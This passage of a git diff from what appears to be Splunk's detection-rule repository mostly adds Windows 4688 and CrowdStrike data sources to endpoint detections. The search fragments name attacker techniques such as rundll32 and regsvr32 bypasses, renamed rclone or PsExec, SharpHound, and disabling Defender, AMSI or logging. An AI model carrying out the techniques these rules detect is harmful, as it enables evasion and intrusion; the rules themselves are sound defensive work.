   module loads for further context.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where `process_regasm` by _time span=1h  Processes.process_id Processes.process_name
   Processes.dest Processes.user Processes.process_path Processes.process  Processes.parent_process_name
diff --git a/detections/endpoint/detect_regsvcs_spawning_a_process.yml b/detections/endpoint/detect_regsvcs_spawning_a_process.yml
index 91fb7c7e28..646e697301 100644
--- a/detections/endpoint/detect_regsvcs_spawning_a_process.yml
+++ b/detections/endpoint/detect_regsvcs_spawning_a_process.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies regsvcs.exe spawning a child proc
   suspicious activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=regsvcs.exe
   by Processes.parent_process_name Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/detect_regsvcs_with_no_command_line_arguments.yml b/detections/endpoint/detect_regsvcs_with_no_command_line_arguments.yml
index 47800ef07f..0a0fe2847a 100644
--- a/detections/endpoint/detect_regsvcs_with_no_command_line_arguments.yml
+++ b/detections/endpoint/detect_regsvcs_with_no_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects instances of regsvcs.exe running wit
   sensitive information.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes
   where `process_regsvcs` by _time span=1h  Processes.process_id Processes.process_name
   Processes.dest Processes.user Processes.process_path Processes.process  Processes.parent_process_name
diff --git a/detections/endpoint/detect_regsvr32_application_control_bypass.yml b/detections/endpoint/detect_regsvr32_application_control_bypass.yml
index a93cf963e5..ccb6c34f83 100644
--- a/detections/endpoint/detect_regsvr32_application_control_bypass.yml
+++ b/detections/endpoint/detect_regsvr32_application_control_bypass.yml
@@ -15,6 +15,8 @@ description: 'The following analytic identifies the abuse of Regsvr32.exe to pro
   code, potentially leading to system compromise and persistent access.'
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_regsvr32` Processes.process=*scrobj*
   by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/detect_remote_access_software_usage_fileinfo.yml b/detections/endpoint/detect_remote_access_software_usage_fileinfo.yml
index 6bda13e076..f1b0f83359 100644
--- a/detections/endpoint/detect_remote_access_software_usage_fileinfo.yml
+++ b/detections/endpoint/detect_remote_access_software_usage_fileinfo.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of processes with file
   potentially leading to data exfiltration or further compromise of the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '`sysmon` EventCode=1 | stats count min(_time) as firstTime max(_time) as
   lastTime, values(Company) as Company values(Product) as Product by dest, user, parent_process_name,
   process_name, process | lookup remote_access_software remote_utility_fileinfo AS
diff --git a/detections/endpoint/detect_remote_access_software_usage_process.yml b/detections/endpoint/detect_remote_access_software_usage_process.yml
index af552ade69..36e51df67e 100644
--- a/detections/endpoint/detect_remote_access_software_usage_process.yml
+++ b/detections/endpoint/detect_remote_access_software_usage_process.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of known remote access
   security.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime values(Processes.parent_process) as parent_process from datamodel=Endpoint.Processes
   where Processes.dest!=unknown Processes.process!=unknown by Processes.dest Processes.user
diff --git a/detections/endpoint/detect_renamed_7_zip.yml b/detections/endpoint/detect_renamed_7_zip.yml
index abfe571860..4e2ebc0a7f 100644
--- a/detections/endpoint/detect_renamed_7_zip.yml
+++ b/detections/endpoint/detect_renamed_7_zip.yml
@@ -16,6 +16,8 @@ description: The following analytic detects the usage of a renamed 7-Zip executa
   activities.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.original_file_name=7z*.exe
   AND Processes.process_name!=7z*.exe) by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/detect_renamed_psexec.yml b/detections/endpoint/detect_renamed_psexec.yml
index 1fdb7b4204..9d7d8bc7d4 100644
--- a/detections/endpoint/detect_renamed_psexec.yml
+++ b/detections/endpoint/detect_renamed_psexec.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where `PsExec.exe` has
   of the network.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name!=psexec.exe
   AND Processes.process_name!=psexec64.exe) AND Processes.original_file_name=psexec.c
diff --git a/detections/endpoint/detect_renamed_rclone.yml b/detections/endpoint/detect_renamed_rclone.yml
index 163caf9566..7f6f2869a7 100644
--- a/detections/endpoint/detect_renamed_rclone.yml
+++ b/detections/endpoint/detect_renamed_rclone.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of a renamed `rclone.e
   leading to significant data loss and further compromise of the affected systems.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.original_file_name=rclone.exe
   AND Processes.process_name!=rclone.exe) by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/detect_renamed_winrar.yml b/detections/endpoint/detect_renamed_winrar.yml
index 7a62f9c579..b5f4ed522a 100644
--- a/detections/endpoint/detect_renamed_winrar.yml
+++ b/detections/endpoint/detect_renamed_winrar.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies instances where `WinRAR.exe` has
   extraction or further system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.original_file_name=WinRAR.exe
   (Processes.process_name!=rar.exe OR Processes.process_name!=winrar.exe) by Processes.dest
diff --git a/detections/endpoint/detect_rtlo_in_process.yml b/detections/endpoint/detect_rtlo_in_process.yml
index 3d7c3ca93b..518c423119 100644
--- a/detections/endpoint/detect_rtlo_in_process.yml
+++ b/detections/endpoint/detect_rtlo_in_process.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the abuse of the right-to-left ov
   leading to unauthorized access, data exfiltration, or further system compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process!=unknown AND
   Processes.action=allowed by Processes.dest Processes.user Processes.original_file_name
diff --git a/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml b/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml
index 12fda2f275..f8f73f69f3 100644
--- a/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml
+++ b/detections/endpoint/detect_rundll32_application_control_bypass___advpack.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rundll32.exe loadin
   network connections, and any spawned child processes for further context.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*advpack*
   by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml b/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml
index 9a81bf670c..9d20f58aff 100644
--- a/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml
+++ b/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rundll32.exe loadin
   a severe threat to system integrity and security.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*setupapi*
   by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml b/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml
index a0897c5b3b..721f1d0f62 100644
--- a/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml
+++ b/detections/endpoint/detect_rundll32_application_control_bypass___syssetup.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of rundll32.exe loadin
   connections, and any spawned child processes for further context.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*syssetup*
   by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name
diff --git a/detections/endpoint/detect_rundll32_inline_hta_execution.yml b/detections/endpoint/detect_rundll32_inline_hta_execution.yml
index 8c8e1260ab..2e59eba9ae 100644
--- a/detections/endpoint/detect_rundll32_inline_hta_execution.yml
+++ b/detections/endpoint/detect_rundll32_inline_hta_execution.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of "rundll32.exe" with
   maintain persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count values(Processes.process)
   as process values(Processes.parent_process) as parent_process min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32`
diff --git a/detections/endpoint/detect_sharphound_command_line_arguments.yml b/detections/endpoint/detect_sharphound_command_line_arguments.yml
index 008f499514..51d16a6f89 100644
--- a/detections/endpoint/detect_sharphound_command_line_arguments.yml
+++ b/detections/endpoint/detect_sharphound_command_line_arguments.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of SharpHound command-
   compromising sensitive information and critical systems.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*-collectionMethod*","*invoke-bloodhound*")
   by Processes.dest Processes.user Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/detect_sharphound_usage.yml b/detections/endpoint/detect_sharphound_usage.yml
index 86389105f7..cf04812b7a 100644
--- a/detections/endpoint/detect_sharphound_usage.yml
+++ b/detections/endpoint/detect_sharphound_usage.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the usage of the SharpHound binary b
   and lateral movement within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where (Processes.process_name=sharphound.exe
   OR Processes.original_file_name=SharpHound.exe) by Processes.dest Processes.user
diff --git a/detections/endpoint/detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml b/detections/endpoint/detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml
index 806d34c814..1aeb9d8929 100644
--- a/detections/endpoint/detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml
+++ b/detections/endpoint/detect_suspicious_processnames_using_pretrained_model_in_dsdl.yml
@@ -6,7 +6,7 @@ author: Abhinav Mishra, Kumar Sharad and Namratha Sreekanta, Splunk
 type: Anomaly
 status: experimental
 data_source:
-- Sysmon Event Code 1
+- Sysmon EventID 1
 description: The following analytic identifies suspicious process names using a pre-trained
   Deep Learning model. It leverages Endpoint Detection and Response (EDR) telemetry
   to analyze process names and predict their likelihood of being malicious. The model,
diff --git a/detections/endpoint/detect_use_of_cmd_exe_to_launch_script_interpreters.yml b/detections/endpoint/detect_use_of_cmd_exe_to_launch_script_interpreters.yml
index bc0e873704..2f836cb956 100644
--- a/detections/endpoint/detect_use_of_cmd_exe_to_launch_script_interpreters.yml
+++ b/detections/endpoint/detect_use_of_cmd_exe_to_launch_script_interpreters.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of cscript.exe or wscr
   to code execution, privilege escalation, or persistence within the environment.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="cmd.exe"
   (Processes.process_name=cscript.exe OR Processes.process_name =wscript.exe) by Processes.parent_process
diff --git a/detections/endpoint/detect_webshell_exploit_behavior.yml b/detections/endpoint/detect_webshell_exploit_behavior.yml
index aa6f4ffd68..42de72b989 100644
--- a/detections/endpoint/detect_webshell_exploit_behavior.yml
+++ b/detections/endpoint/detect_webshell_exploit_behavior.yml
@@ -16,6 +16,8 @@ description: The following analytic identifies the execution of suspicious proce
   data.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count max(_time) as lastTime, min(_time)
   as firstTime from datamodel=Endpoint.Processes where (Processes.process_name IN
   ("arp.exe","at.exe","bash.exe","bitsadmin.exe","certutil.exe","cmd.exe","cscript.exe",
diff --git a/detections/endpoint/detection_of_tools_built_by_nirsoft.yml b/detections/endpoint/detection_of_tools_built_by_nirsoft.yml
index 381540e3e4..f12a51960e 100644
--- a/detections/endpoint/detection_of_tools_built_by_nirsoft.yml
+++ b/detections/endpoint/detection_of_tools_built_by_nirsoft.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of tools built by N
   of the affected system.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) values(Processes.process)
   as process max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*
   /stext *" OR Processes.process="* /scomma *" ) by Processes.parent_process Processes.process_name
diff --git a/detections/endpoint/disable_amsi_through_registry.yml b/detections/endpoint/disable_amsi_through_registry.yml
index ee4ffdd399..ef574c1785 100644
--- a/detections/endpoint/disable_amsi_through_registry.yml
+++ b/detections/endpoint/disable_amsi_through_registry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
   could allow attackers to execute payloads with minimal alerts, leading to potential
   system compromise and data exfiltration.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows Script\\Settings\\AmsiEnable"
diff --git a/detections/endpoint/disable_defender_antivirus_registry.yml b/detections/endpoint/disable_defender_antivirus_registry.yml
index d84a2d4a21..9ed2c7f702 100644
--- a/detections/endpoint/disable_defender_antivirus_registry.yml
+++ b/detections/endpoint/disable_defender_antivirus_registry.yml
@@ -15,7 +15,7 @@ description: The following analytic detects the modification of Windows Defender
   leading to potential data breaches, system compromise, and further propagation of
   malware within the network.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path = "*\\Policies\\Microsoft\\Windows Defender*" Registry.registry_value_name
diff --git a/detections/endpoint/disable_defender_blockatfirstseen_feature.yml b/detections/endpoint/disable_defender_blockatfirstseen_feature.yml
index 349cb889c8..2fd43e341e 100644
--- a/detections/endpoint/disable_defender_blockatfirstseen_feature.yml
+++ b/detections/endpoint/disable_defender_blockatfirstseen_feature.yml
@@ -6,7 +6,7 @@ author: Steven Dick, Teoderick Contreras, Splunk
 status: production
 type: TTP
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 description: The following analytic detects the modification of the Windows registry
   to disable the Windows Defender BlockAtFirstSeen feature. It leverages data from
diff --git a/detections/endpoint/disable_defender_enhanced_notification.yml b/detections/endpoint/disable_defender_enhanced_notification.yml
index 697be6ac02..060054c957 100644
--- a/detections/endpoint/disable_defender_enhanced_notification.yml
+++ b/detections/endpoint/disable_defender_enhanced_notification.yml
@@ -15,9 +15,8 @@ description: The following analytic detects the modification of the registry to
   mechanisms, maintain persistence, and escalate their activities without triggering
   alerts.
 data_source:
-- Sysmon EventID 1
-- Sysmon EventID 12
-- Sysmon EventID 13
+- Sysmon EventID 1 AND Sysmon EventID 12
+- Sysmon EventID 1 AND Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
   AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id
   Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name
diff --git a/detections/endpoint/disable_defender_mpengine_registry.yml b/detections/endpoint/disable_defender_mpengine_registry.yml
index 4f3093af81..f722cb1842 100644
--- a/detections/endpoint/disable_defender_mpengine_registry.yml
+++ b/detections/endpoint/disable_defender_mpengine_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the modification of the Windows Defe
   and further system compromise. Immediate investigation and endpoint isolation are
   recommended.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path = "*\\Policies\\Microsoft\\Windows Defender\\MpEngine*"
diff --git a/detections/endpoint/disable_defender_spynet_reporting.yml b/detections/endpoint/disable_defender_spynet_reporting.yml
index 75d4b76cdd..05b46452a9 100644
--- a/detections/endpoint/disable_defender_spynet_reporting.yml
+++ b/detections/endpoint/disable_defender_spynet_reporting.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the modification of the registry to
   could enable an attacker to evade detection, maintain persistence, and carry out
   further attacks without being flagged by Windows Defender.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path = "*\\Microsoft\\Windows Defender\\SpyNet*" Registry.registry_value_name
diff --git a/detections/endpoint/disable_defender_submit_samples_consent_feature.yml b/detections/endpoint/disable_defender_submit_samples_consent_feature.yml
index d1114bc616..d75edf1bfb 100644
--- a/detections/endpoint/disable_defender_submit_samples_consent_feature.yml
+++ b/detections/endpoint/disable_defender_submit_samples_consent_feature.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the modification of the Windows regi
   analysis. If confirmed malicious, this could allow an attacker to execute malicious
   code without being detected by Windows Defender, leading to potential system compromise.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path = "*\\Microsoft\\Windows Defender\\SpyNet*" Registry.registry_value_name
diff --git a/detections/endpoint/disable_etw_through_registry.yml b/detections/endpoint/disable_etw_through_registry.yml
index dc8513536c..4f8881e579 100644
--- a/detections/endpoint/disable_etw_through_registry.yml
+++ b/detections/endpoint/disable_etw_through_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the registry that d
   attackers to execute payloads with minimal alerts, impairing defenses and potentially
   leading to further compromise of the system.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\.NETFramework\\ETWEnabled"
diff --git a/detections/endpoint/disable_logs_using_wevtutil.yml b/detections/endpoint/disable_logs_using_wevtutil.yml
index d6d862df55..775e2ce23f 100644
--- a/detections/endpoint/disable_logs_using_wevtutil.yml
+++ b/detections/endpoint/disable_logs_using_wevtutil.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of "wevtutil.exe" with
   respond effectively to the incident.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "wevtutil.exe"
   Processes.process = "*sl*" Processes.process = "*/e:false*" by Processes.parent_process_name
diff --git a/detections/endpoint/disable_registry_tool.yml b/detections/endpoint/disable_registry_tool.yml
index 728f09b798..0af25ed655 100644
--- a/detections/endpoint/disable_registry_tool.yml
+++ b/detections/endpoint/disable_registry_tool.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
   could hinder incident response efforts and allow the attacker to maintain control
   over the compromised system.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools"
diff --git a/detections/endpoint/disable_schedule_task.yml b/detections/endpoint/disable_schedule_task.yml
index a486a8376b..7196040a3c 100644
--- a/detections/endpoint/disable_schedule_task.yml
+++ b/detections/endpoint/disable_schedule_task.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of a command to disabl
   security defenses, and further compromise the targeted host.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count  min(_time) as firstTime
   max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=schtasks.exe
   Processes.process=*/change*  Processes.process=*/disable* by Processes.user Processes.process_name
diff --git a/detections/endpoint/disable_security_logs_using_minint_registry.yml b/detections/endpoint/disable_security_logs_using_minint_registry.yml
index c7ef979383..7e7b26e8f2 100644
--- a/detections/endpoint/disable_security_logs_using_minint_registry.yml
+++ b/detections/endpoint/disable_security_logs_using_minint_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a suspicious registry modification a
   undetected, making it difficult to trace their actions and compromising the integrity
   of security audits.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path="*\\Control\\MiniNt\\*") BY _time span=1h  Registry.user
diff --git a/detections/endpoint/disable_show_hidden_files.yml b/detections/endpoint/disable_show_hidden_files.yml
index 11aa7dfb24..9a64a34bc3 100644
--- a/detections/endpoint/disable_show_hidden_files.yml
+++ b/detections/endpoint/disable_show_hidden_files.yml
@@ -13,7 +13,7 @@ description: The following analytic detects modifications to the Windows registr
   behavior could allow an attacker to conceal malicious files on the system, making
   it harder for security tools and analysts to identify and remove the threat.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden"
diff --git a/detections/endpoint/disable_uac_remote_restriction.yml b/detections/endpoint/disable_uac_remote_restriction.yml
index 8473e91fcd..be01d67a03 100644
--- a/detections/endpoint/disable_uac_remote_restriction.yml
+++ b/detections/endpoint/disable_uac_remote_restriction.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the modification of the registry to
   escalation. If confirmed malicious, this could enable an attacker to execute unauthorized
   actions with elevated privileges, compromising the security of the affected system.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path="*\\CurrentVersion\\Policies\\System*" Registry.registry_value_name="LocalAccountTokenFilterPolicy"
diff --git a/detections/endpoint/disable_windows_app_hotkeys.yml b/detections/endpoint/disable_windows_app_hotkeys.yml
index 1550c2f7dd..85e4112bf5 100644
--- a/detections/endpoint/disable_windows_app_hotkeys.yml
+++ b/detections/endpoint/disable_windows_app_hotkeys.yml
@@ -13,7 +13,7 @@ description: The following analytic detects a suspicious registry modification a
   response efforts. If confirmed malicious, this technique can allow an attacker to
   maintain persistence and evade detection, complicating the remediation process.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path="*\\Windows NT\\CurrentVersion\\Image File Execution
diff --git a/detections/endpoint/disable_windows_behavior_monitoring.yml b/detections/endpoint/disable_windows_behavior_monitoring.yml
index faeab8144f..6c8d9b60f5 100644
--- a/detections/endpoint/disable_windows_behavior_monitoring.yml
+++ b/detections/endpoint/disable_windows_behavior_monitoring.yml
@@ -13,7 +13,7 @@ description: The following analytic identifies modifications in the registry to
   If confirmed malicious, this action could allow an attacker to execute code, escalate
   privileges, or persist in the environment without being detected by antivirus software.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time
diff --git a/detections/endpoint/disable_windows_smartscreen_protection.yml b/detections/endpoint/disable_windows_smartscreen_protection.yml
index e56a8075bd..f4eac676b8 100644
--- a/detections/endpoint/disable_windows_smartscreen_protection.yml
+++ b/detections/endpoint/disable_windows_smartscreen_protection.yml
@@ -15,7 +15,7 @@ description: The following analytic detects modifications to the Windows registr
   bypass security measures, increasing the risk of successful phishing attacks and
   malware infections.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE Registry.registry_path IN ("*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SmartScreenEnabled",
diff --git a/detections/endpoint/disabling_cmd_application.yml b/detections/endpoint/disabling_cmd_application.yml
index b230da25d7..6dee1757b5 100644
--- a/detections/endpoint/disabling_cmd_application.yml
+++ b/detections/endpoint/disabling_cmd_application.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the registry that d
   for directory and file traversal, complicating incident response and allowing the
   attacker to maintain persistence.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Policies\\Microsoft\\Windows\\System\\DisableCMD"
diff --git a/detections/endpoint/disabling_controlpanel.yml b/detections/endpoint/disabling_controlpanel.yml
index d15f60dd93..19c156b161 100644
--- a/detections/endpoint/disabling_controlpanel.yml
+++ b/detections/endpoint/disabling_controlpanel.yml
@@ -15,7 +15,7 @@ description: The following analytic detects registry modifications that disable
   this could allow attackers to maintain control over the infected machine and prevent
   remediation efforts.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path= "*\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel"
diff --git a/detections/endpoint/disabling_defender_services.yml b/detections/endpoint/disabling_defender_services.yml
index 7b116079f4..2b6483c299 100644
--- a/detections/endpoint/disabling_defender_services.yml
+++ b/detections/endpoint/disabling_defender_services.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the disabling of Windows Defender se
   allow attackers to execute further malicious activities undetected, leading to potential
   data breaches or system compromise.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
 - Sysmon EventID 13
 search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
   WHERE (Registry.registry_path = "*\\System\\CurrentControlSet\\Services\\*" AND
diff --git a/detections/endpoint/disabling_firewall_with_netsh.yml b/detections/endpoint/disabling_firewall_with_netsh.yml
index fc68aa3afd..bb022e6e77 100644
--- a/detections/endpoint/disabling_firewall_with_netsh.yml
+++ b/detections/endpoint/disabling_firewall_with_netsh.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the disabling of the firewall usi
   compromise.
 data_source:
 - Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
 search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
   as lastTime from datamodel=Endpoint.Processes where `process_netsh` Processes.process=
   "*firewall*" (Processes.process= "*off*" OR  Processes.process= "*disable*") by
diff --git a/detections/endpoint/disabling_folderoptions_windows_feature.yml b/detections/endpoint/disabling_folderoptions_windows_feature.yml
index f02279df0b..22f362cb21 100644
--- a/detections/endpoint/disabling_folderoptions_windows_feature.yml
+++ b/detections/endpoint/disabling_folderoptions_windows_feature.yml
@@ -15,7 +15,7 @@ description: The following analytic detects the modification of the Windows regi
   If confirmed malicious, this could allow an attacker to hide their presence and
   malicious files, making detection and remediation more difficult.
 data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12 
